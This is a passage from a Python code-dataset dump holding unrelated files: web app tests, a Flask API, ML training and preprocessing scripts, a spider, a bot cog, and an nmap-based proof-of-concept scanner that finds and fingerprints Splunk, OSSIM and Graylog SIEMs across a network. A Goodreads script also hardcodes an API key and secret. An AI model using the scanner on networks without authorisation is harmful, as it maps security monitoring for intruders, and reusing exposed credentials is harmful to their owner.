HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n response = json_render(request, 'base.html', {})\n result = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(response.status_code, 200)\n self.assertTrue('html' in result)\n\n def test_json_redirect(self):\n \"\"\"\n Test that the json_redirect view works properly.\n \"\"\"\n self.factory = RequestFactory()\n # raises an error if not an ajax request\n request = self.factory.get('/dummy')\n with self.assertRaises(PermissionDenied):\n response = json_redirect(request, '/dummy2')\n # works fine if it is an ajax request\n request = self.factory.get(\n '/dummy', HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n response = json_redirect(request, '/dummy2')\n result = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(response.status_code, 200)\n self.assertTrue('url' in result)\n\n\nclass Paginate(TestCase):\n def get_article_set(self):\n \"\"\"\n Return a list of article instances.\n \"\"\"\n # Our paginator does not care if the instance is a model or not, so\n # create a dummy class here to use instead of an actual model.\n Article = namedtuple(\"Article\", field_names=('title'))\n\n output = []\n for x in range(1, 10):\n output += Article(title='Test%s' % x)\n return output\n\n def get_scenarios(self):\n return (\n # ( params, page, prev_params, next_params, results )\n\n # page 1 (default)\n ( '', 1, None, 'p=2', ['Test1', 'Test2', 'Test3']),\n # page 1 is default for non-numeric\n ( 'p=invalid', 1, None, 'p=2', ['Test1', 'Test2', 'Test3']),\n # page 2 has next and previous\n ( 'p=2', 2, 'p=1', 'p=3', ['Test4', 'Test5', 'Test6']),\n # page 3 does not have next\n ( 'p=3', 3, 'p=2', None, ['Test7', 'Test8', 'Test9']),\n # additional query params\n ('a=1&b=2&p=2', 2, 'a=1&b=2&p=1', 'a=1&b=2&p=3',\n ['Test4', 'Test5', 'Test6']),\n )\n\n def test_paginate(self):\n \"\"\"\n Test that our custom paginate() method works properly.\n \"\"\"\n factory = RequestFactory()\n articles = self.get_article_set()\n url = '/dummy/page'\n\n for test in self.get_scenarios():\n params, page, prev_params, next_params, results = test\n request = factory.get(url + '?' + QueryDict(params).urlencode())\n paginator, queryset = paginate(request, articles, 3)\n self.assertEqual(paginator.this_page.number, page)\n self.assertEqual(queryset, results)\n if next_params:\n next_dict = QueryDict(next_params)\n pag_dict = QueryDict(urlparse(paginator.next_url).query)\n self.assertEqual(next_dict, pag_dict)\n if prev_params:\n prev_dict = QueryDict(prev_params)\n pag_dict = QueryDict(urlparse(paginator.previous_url).query)\n self.assertEqual(prev_dict, pag_dict)\n\n # there is no page 4 so it throws an error\n request = factory.get('/dummy?p=4')\n with self.assertRaises(Http404):\n paginate(request, articles, 3)\n\n # allow empty works\n request = factory.get('/dummy')\n paginator, queryset = paginate(request, [], 3, allow_empty=True)\n self.assertEqual(queryset, [])\n\n # don't allow empty\n request = factory.get('/dummy')\n with self.assertRaises(Http404):\n paginate(request, [], 3, allow_empty=False)","sub_path":"utils/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"434420969","text":"from flask import Blueprint, jsonify, request\nimport models\nfrom playhouse.shortcuts import model_to_dict\nfrom peewee import IntegrityError\n\nvisitor = Blueprint('whispering_oaks', 'visitor')\n\n\n@visitor.route('/', methods=['GET'])\ndef get_all_visitors():\n try:\n db_whispering_oaks = models.Visitor.select()\n visitors = []\n\n for visitor in db_whispering_oaks:\n visitors.append(model_to_dict(visitor))\n\n return jsonify(data=visitors, status={'code': 200, 'message': 'Success'})\n\n except models.DoesNotExist:\n return jsonify(data={}, status={'code': 401, 'message': 'Error getting the resource'})\n\n\n@visitor.route('/', methods=['POST'])\ndef create_visitor():\n payload = request.get_json()\n\n try:\n visitor = models.Visitor.create(\n name=payload['name'], number=payload['number'], email=payload['email'], date=payload['date'], message=payload['message'])\n\n return jsonify(data=model_to_dict(visitor), status={'code': 201, 'message': 'Success'})\n\n except IntegrityError:\n print('Invalid Schema was sent')\n\n return jsonify(data={}, status={'code': 401, 'message': 'Invalid visitor schema'})\n","sub_path":"resources/whispering_oaks.py","file_name":"whispering_oaks.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"339362014","text":"import random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nimport pandas as pd\nimport sys\nfrom utils.encode_decode import pickle_model\nfrom bank_marketing.common_utils.train_utils import Encoder\n\n\ndef train(msg):\n random.seed(0)\n training_data_uri = msg.payload.get(\"$ref\", \"./data/bank_marketing-prepped.csv\")\n save_model_as = msg.payload.get(\"model_name\")\n data = pd.read_csv(training_data_uri)\n feature_names = list(data.columns[:-1])\n\n # Separate outcome\n y = data[\"deposit\"]\n X = data.drop(\"deposit\", axis=1)\n\n # apply encoder data\n scaler = Encoder(X)\n scaler.fit(X)\n\n X_onehot = scaler.transform(X)\n\n # split test and training\n X_train, X_test, y_train, y_test = train_test_split(\n X_onehot, y, test_size=0.3, random_state=4\n )\n # start model training\n mlp = MLPClassifier()\n mlp.fit(X_train, y_train)\n mlp.score(X_test, y_test)\n mlp_acc = mlp.score(X_test, y_test)\n model_binary = f\"models/{save_model_as}.pkl\"\n pickle_model(mlp, scaler, \"MLP\", mlp_acc, \"Basic MLP classifier\", model_binary)\n print(mlp_acc)\n return f\"model: {model_binary}\"\n\n","sub_path":"bank_marketing/multiLayerPerceptron/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"210063010","text":"# -*- coding: utf-8 -*-\nimport re\nimport urllib\nfrom urlparse import urljoin\nimport scrapy\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom hccc.items import Councilor\nfrom crawler_lib import parse\nfrom crawler_lib import misc\n\n\nclass Spider(scrapy.Spider):\n name = \"councilors\"\n base_url = \"http://www.hsinchu-cc.gov.tw\"\n allowed_domains = [\"www.hsinchu-cc.gov.tw\"]\n start_urls = [\"http://www.hsinchu-cc.gov.tw/content/councilor.htm\", ]\n download_delay = 0.5\n\n def parse(self, response):\n sel = Selector(response)\n nodes = sel.xpath(u'//a')\n base_url = self.base_url + '/content/'\n for node in nodes:\n url = base_url + node.xpath('@href').extract()[0]\n yield Request(url, callback=self.parse_profile)\n\n def parse_profile(self, response):\n sel = Selector(response)\n main_node = sel.xpath('/html/body/table/tbody/tr[1]/td/table[2]/tbody')\n basic_info_node = main_node.xpath('tr[1]/td[2]/p')\n sub_table_node = main_node.xpath('.//tbody')\n base_url = self.base_url + '/content/'\n\n item = Councilor()\n item['contact_details'] = []\n item['links'] = [{'url': response.url, 'note': u'議會個人官網'}]\n item['image'] = base_url + parse.get_extracted(sel.xpath(u'//div/img/@src'))\n\n key_map = {\n u'性別': 'gender',\n u'黨籍': 'party',\n u'選區': 'constituency',\n }\n\n for i, line in enumerate(basic_info_node.xpath('.//text()').extract()):\n line = line.strip()\n if i == 0:\n item['name'] = line\n continue\n\n cols = line.split(u':')\n k_chinese = parse.remove_whitespaces(cols[0])\n value = cols[1]\n\n k_eng = key_map.get(k_chinese)\n if k_eng:\n item[k_eng] = value\n\n for tr in sub_table_node.xpath('tr'):\n cols = tr.xpath('td')\n left = parse.remove_whitespaces(parse.get_extracted(cols[0].xpath('text()')).strip())\n right = parse.get_inner_text(cols[1])\n\n if left == u'政見':\n item['platform'] = parse.get_inner_text_lines(cols[1])\n if left == u'服務處地址':\n misc.append_contact(item, 'address', left, right)\n if left == u'電子郵件信箱':\n misc.append_contact(item, 'email', left, right)\n if u'電話' in left:\n misc.append_contact(item, 'voice', left, right)\n if u'網址' in left:\n item['links'].append({'url': right, 'note': left})\n\n return item\n\n","sub_path":"crawler/hccc/hccc/spiders/councilors.py","file_name":"councilors.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"70282635","text":"#! /data/data/com.termux/files/usr/bin/python3\n\nfrom database import Database\nfrom exercise import Exercise\nimport os\nimport readline\nimport time\nfrom utilities import *\n\ndef log_exercise(db,log_dir):\n write_or_append = \"w\"\n if len(db) == 0:\n print(\"No exercises in database.\")\n return\n log_msg = \"Enter index corresponding to the exercise: \"\n list_items(db)\n lift_index = get_number(log_msg,int)\n if lift_index < 0 or lift_index >= len(db):\n print(\"Invalid Index\")\n return \n weight = get_number(\"Enter the weight lifted: \",float)\n sets = get_number(\"Enter the number of sets: \", int)\n if not isinstance(sets,int):\n print(\"Not a number.\")\n return\n\n reps = []\n for i in range(sets):\n reps.append(get_number(\"Reps in set %d: \" % (i+1),int))\n reps_string = \"\"\n for rep_set in reps:\n reps_string += str(rep_set) + \",\"\n reps_string = reps_string[:-1]\n\n log_path = \"%s%d_%.2d_%.2d_%s\" % (log_dir,time.localtime()[0],time.localtime()[1],time.localtime()[2],time.ctime().split(\" \")[0] + \"_exercise_log.txt\")\n\n if path_exists(log_path):\n write_or_append = \"a\"\n\n with open(log_path,write_or_append) as f:\n f.write(repr(db[lift_index]) + \"\\t\" + str(weight) + \"\\t\" + reps_string + \"\\n\")\n\ndef create_exercise(db):\n list_items(db)\n name = get_string(\"Enter the name of the exercise: \")\n new_exercise = Exercise(name)\n db.add(new_exercise)\n\ndef get_log_path(log_dir):\n return \"%s%d_%.2d_%.2d_%s\" % (log_dir,time.localtime()[0],time.localtime()[1],time.localtime()[2],time.ctime().split(\" \")[0] + \"_exercise_log.txt\")\n\ndef output(log_line):\n name, weight, reps_per_set = log_line.split(\"\\t\")\n set_count = len(reps_per_set.split(\",\"))\n output_string = str(set_count) + \" sets of \" + reps_per_set.strip() + \" reps of \" + name + \" at \" + weight + \" lbs\\n\"\n return output_string\n\ndef view_stats(log_dir):\n current_path = get_log_path(log_dir)\n if path_exists(current_path):\n with open(current_path,\"r\") as f:\n for line in f:\n print(output(line))\n else:\n print(\"\\nPath does not exist.\")\n\ndef get_log_str(log_dir: str, path: str) -> str:\n string = \"\"\n log_path = get_log_path(log_dir)\n file_list = os.listdir(log_dir)\n with open(path, \"r\") as f:\n string += \"\\nLog from %s :\\n\" % path\n for line in f:\n string += output(line)\n return string\n\n## Show the previous two workouts if they exist\ndef show_previous(log_dir):\n log_path = get_log_path(log_dir)\n file_list = os.listdir(log_dir)\n if len(file_list) > 0:\n if log_dir+file_list[-1] != log_path:\n file_index = -1\n elif log_dir+file_list[-1] == log_path and len(file_list) > 1:\n file_index = -2\n if len(file_list) > 2:\n print(get_log_str(log_dir, log_dir + file_list[file_index - 1]))\n print(get_log_str(log_dir, log_dir + file_list[file_index]))\n with open(log_dir+file_list[file_index], \"r\") as f:\n print(\"\\nLog from \" + file_list[file_index] + \":\")\n for line in f:\n output(line)\ndef show_exercises(db):\n for item in db:\n print(item)\n\nif os.path.isfile(\"DEBUG\"):\n database_dir = \"./.lifts\"\n log_dir = \"./exercise_logs/\"\nelse:\n database_dir = \"/data/data/com.termux/files/home/.lifts/\"\n log_dir = \"/data/data/com.termux/files/home/exercise_logs/\"\n\ndatabase = Database(dirpath=database_dir,filename=\"lifts.dat\",fieldname=\"name\")\n\nstart_msg = \"\\nEnter to exit.\\n\\n1. Add exercise to log\\n2. Create new exercise in database\\n3. View Stats\\n4. Remove Exercise from Database \\n5. See previous stats\\n6. View Exercise Catalog\\n: \"\n\nuser_input = get_number(start_msg,int)\n\nwhile user_input != 'q':\n if user_input == 1:\n print(\"Add new exercise..\")\n log_exercise(database,log_dir)\n elif user_input == 2:\n print(\"Put new exercise in database.\")\n create_exercise(database)\n elif user_input == 3:\n view_stats(log_dir)\n elif user_input == 4:\n print(\"Removing exercise from database.\")\n remove_database_item(database)\n elif user_input == 5:\n show_previous(log_dir)\n elif user_input == 6:\n show_exercises(database)\n user_input = get_number(start_msg,int)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"292086302","text":"#!/usr/bin/env python3\n\n# Nmap Scanning Module\n\n# %%%%%%%%%%% Libraries %%%%%%%%%%%#\n\nfrom colorama import Fore, Back, Style\nimport logging\nimport nmap\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# %%%%%%%%%%% Constants %%%%%%%%%%%#\n\nSEPARATOR = \"[*] {0} [*]\".format('=' * 110)\nSPLUNK_TCP_PORT = 8089\nOSSIM_TCP_PORT = 443\nGRAYLOG_TCP_PORT = 9000\n\n# %%%%%%%%%%% Functions %%%%%%%%%%%#\n\ndef input_ip():\n\n\tsiemip = input(\"[!] Enter IP address of the SIEM: \")\n\treturn siemip\n\ndef scan_host(ip):\n\n\tsiemdetected = \"None\"\n\tsiemip = ip\n\n\ttry:\n\t\tnm = nmap.PortScanner()\n\t\tnm.scan(hosts = siemip, arguments = '-sT -T4 -p 8089,443,9000')\n\n\t\tif (nm[siemip]['tcp'][SPLUNK_TCP_PORT]['state'] == 'open' or\n\t\t\t\tnm[siemip]['tcp'][OSSIM_TCP_PORT]['state'] == 'open' or\n\t\t\t\tnm[siemip]['tcp'][GRAYLOG_TCP_PORT]['state'] == 'open'):\n\n\t\t\tprint('[!] IP Address: %s' % ip)\n\t\t\tprint('[!] Hostname: %s' % nm[siemip].hostname())\n\t\t\tprint('[!] State: %s' % nm[siemip].state())\n\t\t\tprint(SEPARATOR)\n\n\t\t\tfor proto in nm[siemip].all_protocols():\n\t\t\t\tlport = nm[siemip][proto].keys()\n\n\t\t\t\tfor port in lport:\n\t\t\t\t\tif nm[siemip][proto][port]['state'] == 'open':\n\t\t\t\t\t\tprint(\"[!] Port: %s State: %s\" % (port, nm[siemip][proto][port]['state']))\n\n\t\t\t\t\t\tif nm[siemip]['tcp'][SPLUNK_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"https://\" + siemip + \":8089\"\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url, verify = False)\n\t\t\t\t\t\t\t\tif \"splunkd\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"Splunk\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\t\t\t\t\t\telif nm[siemip]['tcp'][GRAYLOG_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"http://\" + siemip + \":9000\"\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url)\n\t\t\t\t\t\t\t\tif \"Graylog Web Interface\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"Graylog\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\t\t\t\t\t\telif nm[siemip]['tcp'][OSSIM_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"https://\" + siemip + \"/ossim/session/login.php\"\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url, verify = False)\n\t\t\t\t\t\t\t\tif \"AlienVault OSSIM\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"OSSIM\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\texcept Exception as e:\n\t\tlogging.error(e, exc_info = True)\n\n\tif siemdetected != \"None\":\n\t\tprint(SEPARATOR)\n\t\tprint(\"[!] The SIEM detected is: \" + Fore.RED + Style.BRIGHT + siemdetected)\n\t\tprint(SEPARATOR)\n\n\treturn siemdetected\n\ndef scan_network():\n\n\tprint(SEPARATOR)\n\tsiemnet = input(\n\t\t\"[!] Enter network to scan for SIEMs in CIDR notation, for example: 192.168.1.0/24: \")\n\n\ttry:\n\t\tnm = nmap.PortScanner()\n\t\tnm.scan(hosts = siemnet, arguments = '-sP -PS8089,443,9000')\n\t\treturn nm.all_hosts()\n\n\texcept Exception as e:\n\t\tlogging.error(e, exc_info = True)\n\n# %%%%%%%%%% The End %%%%%%%%%%#\n","sub_path":"poc/scanning.py","file_name":"scanning.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"212887676","text":"\"\"\"A simple command line application that consumes a Public API using a HTTP client library.\nMy test uses GoodReads API\n#api_key = \"UiFicY0HAqcAVaiWUmoVw\"\nSome of output from the below program:\n\n3.50\n 2\n \n\n\n18541\nTim O'Reilly\n\n\n\n\n\n\n\n\n3.83\n1561\n128\n\n\n 2015\n\n\"\"\"\n\nimport requests\n\nprint(\"Search for Book Authors with this app\")\n\nauthor_id = input ( \"Enter Goodreads User: \" )\n\napi_secret = \"JCZKvzXggksmdaXMrWKuS4P2w48HseiYSVNEOBvnLs\"\nresponse = requests.get ( \"https://www.goodreads.com/author/show.xml\" , params={#decode json from the response\n 'id': '18541' ,#AuthorID\n 'key': 'UiFicY0HAqcAVaiWUmoVw' ,\n 'secret': 'JCZKvzXggksmdaXMrWKuS4P2w48HseiYSVNEOBvnL'\n} )\nprint(response.text)\n","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"567754133","text":"import discord\r\nimport discord.ext.commands as commands\r\nfrom datetime import datetime\r\n\r\n\r\nclass ggpog(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n\r\n @commands.Cog.listener()\r\n async def on_member_remove(self, member):\r\n try :\r\n guild = self.bot.get_guild(477929808022601739)\r\n pog_champ = guild.get_role(786300688866082886)\r\n\r\n mod_chat = guild.get_channel(746335357079126046)\r\n\r\n embed = discord.Embed(title = \"Pog Champ has left the server!\")\r\n embed.description = f\"{member.mention} {member} has left the server.\"\r\n embed.timestamp = datetime.utcnow()\r\n\r\n if pog_champ in member.roles :\r\n await mod_chat.send(embed = embed)\r\n\r\n else :\r\n pass\r\n\r\n\r\n except Exception as error :\r\n raise error\r\n \r\n \r\n\r\ndef setup(bot):\r\n bot.add_cog(ggpog(bot))\r\n","sub_path":"ggpog/ggpog.py","file_name":"ggpog.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"207739684","text":"# 03_Conditions.py\n# \n# You remember how we used TRUE and FALSE? These are just TWO types of \n# MANY conditions we can use. \n#\n# With an IF statement condition, as long as the condition you have provided\n# is TRUE, then the code in the IF statement will run. Then we can \n# use the ELSE for anything else.\n#\n# This technique is used for:\n# - Checking passwords are correct\n# - Checking if your character has hit the ground in a game.\n# - Use in your controllers for Minecraft to see if you are walking forward\n# , backward, left, right or anything else. \n# \n\n\ndef main():\n\t\n\t# To make the statement,we will need these comparison operators:\n\t# == : Equals\n\t# != : Not Equals\n\t# > : Greater than\n\t# < : Less Than\n\t# >= : Greater than or equal to.\n\t# <= : Less than or equal to \n\t# \n\t# Lets try the equals one with something we know is true.\n\t\n\tif 1==1: \n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\t\n\t# Lets try something that we know is false. \n\t\n\tif 1 == 2:\n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\t\n\t# What is going to print?\n\t\n\t# Lets try a greater than one.\n\t\n\tif 2 > 1:\n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\n\t# Try your own below. \n\tif 5 == 7:\n\t\tprint(\"This is true!\")\n\telse:\n\t\tprint(\"This is false...\")\n\t# Try write a function that simplifies the above stuff...\n\t# Call the function \"TrueOrFalse()\" where the argument is the \n\t# Condition...\n\tTrueOrFalse(1==1)\n\tTrueOrFalse(2==3)\n\tTrueOrFalse(5<8)\n\n\t\n\t\t\ndef TrueOrFalse(Condition):\n\tif(Condition):\n\t\tprint(\"That is correct!\")\n\telse:\n\t\tprint(\"That is incorrect!\")\n\t\nif __name__ == \"__main__\":\n\timport sys\n\tmain()\n\t\n\tsys.exit()\n","sub_path":"Lesson_04 Controls/03_Conditions.py","file_name":"03_Conditions.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"84855915","text":"# -*- coding: utf-8 -*-\nimport re\nimport numpy as np \nfrom math import inf\n\nfrom Param import Param\n\nclass ParamRobot(Param):\n '''\n Classe permettant de lire et écrire dans un fichier de paramétre du robot.\n '''\n def __init__(self):\n self.param = {}\n self.fileName = \"robot_param\"\n \n self.load()\n\n \n def load(self):\n lines = []\n with open(self.fileName, \"r\") as param_file:\n for line in param_file:\n lines.append(line)\n \n self.param = {}\n path = []\n for line in lines:\n line = re.sub('[\\n]', \"\", line)\n p = re.split(\"[: ]\", line)\n \n thisPath = []\n \n for i,value in enumerate(p.copy()):\n if value != \"\":\n thisPath = path[:i]\n p = p[i:]\n break\n \n if len(p) < 2:\n continue\n \n path = thisPath\n \n if p[1] == \"\":\n path.append(p[0])\n continue\n else :\n thisPath.append(p[0])\n thisPath = \":\".join(thisPath)\n self.set_param(thisPath, p[1])\n\n self.param['t34'] = self.load_t34()\n \n def load_t34(self):\n try:\n return np.genfromtxt('t34',delimiter=' ',encoding=\"utf8\")\n except :\n return np.eye(4)\n\n def save(self):\n save = self.dictToSerial(self.param, 0)\n print(save)\n with open(self.fileName, \"w\") as param_file:\n param_file.write(save)\n \n t34 = self.get_param(\"t34\")\n with open(\"t34\", \"w\") as t34_file:\n np.savetxt(t34_file, t34)\n \n def get_posmax(self, *index):\n vmax = []\n for i in index:\n path = \"q\" + str(i) + \":pos:max\"\n vmax.append(self.get_param(path, val_def=inf, type_var=float))\n return vmax\n \n def get_vmax(self, *index):\n vmax = []\n for i in index:\n path = \"q\" + str(i) + \":vmax\"\n vmax.append(self.get_param(path, val_def=inf, type_var=float))\n return vmax\n \n def get_amax(self, *index):\n vmax = []\n for i in index:\n path = \"q\" + str(i) + \":amax\"\n vmax.append(self.get_param(path, val_def=inf, type_var=float))\n return vmax\n \n def get_posmin(self, *index):\n vmax = []\n for i in index:\n path = \"q\" + str(i) + \":pos:min\"\n vmax.append(self.get_param(path, val_def=-inf, type_var=float))\n return vmax","sub_path":"ParamRobot.py","file_name":"ParamRobot.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"474913779","text":"import os\nimport re\nimport jieba\nimport config.get_config as _config\nfrom zhon.hanzi import punctuation\n\n'''\n对话数据集预处理模块\nraw_data保存原数据集路径\ntokenized_data保存分词后的数据集路径\n'''\n\n\ndef preprocess_raw_data():\n \"\"\"\n 用来对原始文本进行预处理的方法,主要是将原\n 始文本进行分词后,保存在一个新的文本中,供后继使用\n :return:\n \"\"\"\n raw_data = _config.resource_data\n tokenized_data = _config.tokenized_data\n\n # 首先判断原数据集是否存在,不存在则退出\n if not os.path.exists(raw_data):\n print('数据集不存在,请添加数据集!')\n exit()\n\n pairs = []\n\n # 对每一轮对话上下文进行配对,形成一问一答两个部分,如果遇到\n # 下一轮对话,直接跳过\n with open(raw_data, encoding='utf-8') as raw_file:\n one_pair = []\n pair_count = 0\n for line in raw_file:\n line = line.strip('\\n').replace('/', '')\n # line = re.sub(r\"[%s]+\" % punctuation, \"\", line)\n # 因为原始数据集中,是一轮一轮的对话排列的,所以需要注意的是\n # 在一轮对话结束之后,最后一句不能作为问句,需要跳到下一轮进行处理\n if line == '':\n one_pair = []\n continue\n elif len(one_pair) == 1:\n one_pair.append(line)\n pairs.append(one_pair)\n one_pair = [line]\n pair_count += 1\n if pair_count % 10000 == 0:\n print('已处理:', pair_count, '个问答对')\n else:\n one_pair.append(line)\n\n print('读取完毕,处理中...')\n results = []\n # 接下来,我们把上面的对话内容进行分词,并存入train_tokenized文本中\n for pair in pairs:\n if len(pair) != 2:\n continue\n\n # 使用jieba分词器进行分词\n pair[0] = \" \".join(jieba.cut(pair[0]))\n pair[1] = \" \".join(jieba.cut(pair[1]))\n results.append(pair[0] + '\\t' + pair[1])\n\n # 将处理之后存在内存中的数据写入到新文本中\n train_tokenized = open(tokenized_data, 'w', encoding='utf-8')\n for i in range(len(results)):\n train_tokenized.write(results[i] + '\\n')\n if i % 10000 == 0:\n print(len(range(len(results))), '处理进度:', i)\n\n train_tokenized.close()\n","sub_path":"hlp/chat/common/pre_treat.py","file_name":"pre_treat.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"467837194","text":"import pandas as pd\nimport numpy as np\nimport s3fs\n\n\ndef preprocess(s3_in_url,\n s3_out_bucket,\n s3_out_prefix,\n delimiter=\",\"):\n \"\"\"Preprocesses data based on business logic\n\n - Reads delimited file passed as s3_url and preprocess data by filtering\n long tail in the customer ratings data i.e. keep customers who have rated 5\n or more videos, and videos that have been rated by 9+ customers\n - Preprocessed data is then written to output\n\n Args:\n s3_in_url:\n s3 url to the delimited file to be processed\n e.g. s3://amazon-reviews-pds/tsv/reviews.tsv.gz\n s3_out_bucket:\n s3 bucket where preprocessed data will be staged\n e.g. mybucket\n s3_out_prefix:\n s3 url prefix to stage preprocessed data to use later in the pipeline\n e.g. amazon-reviews-pds/preprocess/\n delimiter:\n delimiter to be used for parsing the file. Defaults to \",\" if none\n provided\n\n Returns:\n status of preprocessed data\n\n Raises:\n IOError: An error occurred accessing the s3 file\n \"\"\"\n try:\n print(\"preprocessing data from {}\".format(s3_in_url))\n # read s3 url into pandas dataframe\n # pandas internally uses s3fs to read s3 file directory\n df = pd.read_csv(s3_in_url, delimiter, error_bad_lines=False)\n\n # limit dataframe to customer_id, product_id, and star_rating\n # `product_title` will be useful validating recommendations\n df = df[['customer_id', 'product_id', 'star_rating', 'product_title']]\n\n # clean out the long tail because most people haven't seen most videos,\n # and people rate fewer videos than they actually watch\n customers = df['customer_id'].value_counts()\n products = df['product_id'].value_counts()\n\n # based on data exploration only about 5% of customers have rated 5 or\n # more videos, and only 25% of videos have been rated by 9+ customers\n customers = customers[customers >= 5]\n products = products[products >= 10]\n print(\"# of rows before the long tail = {:10d}\".format(df.shape[0]))\n reduced_df = df \\\n .merge(pd.DataFrame({'customer_id': customers.index})) \\\n .merge(pd.DataFrame({'product_id': products.index}))\n print(\"# of rows after the long tail = {:10d}\".format(\n reduced_df.shape[0]))\n reduced_df = reduced_df.drop_duplicates(['customer_id', 'product_id'])\n print(\"# of rows after removing duplicates = {:10d}\".format(\n reduced_df.shape[0]))\n\n # recreate customer and product lists since there are customers with\n # more than 5 reviews, but all of their reviews are on products with\n # less than 5 reviews (and vice versa)\n customers = reduced_df['customer_id'].value_counts()\n products = reduced_df['product_id'].value_counts()\n\n # sequentially index each user and item to hold the sparse format where\n # the indices indicate the row and column in our ratings matrix\n customer_index = pd.DataFrame({\n 'customer_id': customers.index,\n 'customer': np.arange(customers.shape[0])})\n product_index = pd.DataFrame({\n 'product_id': products.index,\n 'product': np.arange(products.shape[0])})\n reduced_df = reduced_df \\\n .merge(customer_index) \\\n .merge(product_index)\n\n nb_customer = reduced_df['customer'].max() + 1\n nb_products = reduced_df['product'].max() + 1\n feature_dim = nb_customer + nb_products\n print(nb_customer, nb_products, feature_dim)\n\n product_df = reduced_df[['customer', 'product', 'star_rating']]\n\n # split into train, validation and test data sets\n train_df, validate_df, test_df = np.split(\n product_df.sample(frac=1),\n [int(.6*len(product_df)), int(.8*len(product_df))]\n )\n\n print(\"# of rows train data set = {:10d}\".format(\n train_df.shape[0]))\n print(\"# of rows validation data set = {:10d}\".format(\n validate_df.shape[0]))\n print(\"# of rows test data set = {:10d}\".format(\n test_df.shape[0]))\n\n # select columns required for training the model\n # excluding columns \"customer_id\", \"product_id\", \"product_title\" to\n # keep files small\n cols = [\"customer\", \"product\", \"star_rating\"]\n train_df = train_df[cols]\n validate_df = validate_df[cols]\n test_df = test_df[cols]\n\n # write output to s3 as delimited file\n fs = s3fs.S3FileSystem(anon=False)\n if s3_out_prefix[-1] == \"/\":\n s3_out_prefix = s3_out_prefix[:-1]\n else:\n s3_out_prefix = s3_out_prefix\n s3_out_train = \"s3://{}/{}/{}\".format(\n s3_out_bucket, s3_out_prefix, \"train/train.csv\")\n print(\"writing training data to {}\".format(s3_out_train))\n with fs.open(s3_out_train, \"wb\") as f:\n train_df.to_csv(f, sep=str(','), index=False)\n\n s3_out_validate = \"s3://{}/{}/{}\".format(\n s3_out_bucket, s3_out_prefix, \"validate/validate.csv\")\n print(\"writing test data to {}\".format(s3_out_validate))\n with fs.open(s3_out_validate, \"wb\") as f:\n validate_df.to_csv(f, sep=str(','), index=False)\n\n s3_out_test = \"s3://{}/{}/{}\".format(\n s3_out_bucket, s3_out_prefix, \"test/test.csv\")\n print(\"writing test data to {}\".format(s3_out_test))\n with fs.open(s3_out_test, \"wb\") as f:\n test_df.to_csv(f, sep=str(','), index=False)\n\n print(\"preprocessing completed\")\n return \"SUCCESS\"\n except Exception as e:\n raise e\n","sub_path":"ejcorp_assignment_2/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"581019841","text":"from __future__ import print_function\n\nimport tensorflow as tf\nimport re\nimport numpy as np\nimport cPickle\nimport random\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\nimport threading\n\nfrom multiprocessing import Process\n\nfrom scipy import ndimage\nFLAGS = 